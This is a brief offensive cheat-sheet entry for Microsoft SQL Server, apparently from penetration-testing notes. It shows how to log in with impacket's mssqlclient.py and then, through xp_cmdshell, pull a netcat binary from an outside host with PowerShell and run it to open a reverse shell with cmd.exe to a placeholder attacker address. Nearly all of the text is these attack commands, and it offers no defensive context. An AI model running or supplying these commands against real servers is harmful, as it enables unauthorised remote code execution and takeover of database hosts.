MSSQL

mssqlclient.py

• From impacket

mssqlclient.py user@server -db dbname -windows-auth

Get Reverse Shell (Need XP_CMDSHELL)

SQL> EXEC xp_cmdshell 'powershell.exe Invoke-WebRequest -o nc.exe http://xx.xx.xx.xx/file.exe'
SQL > EXEC xp_cmdshell 'file.exe -e cmd.exe xxx.xxx.xxx.xxx xxxx'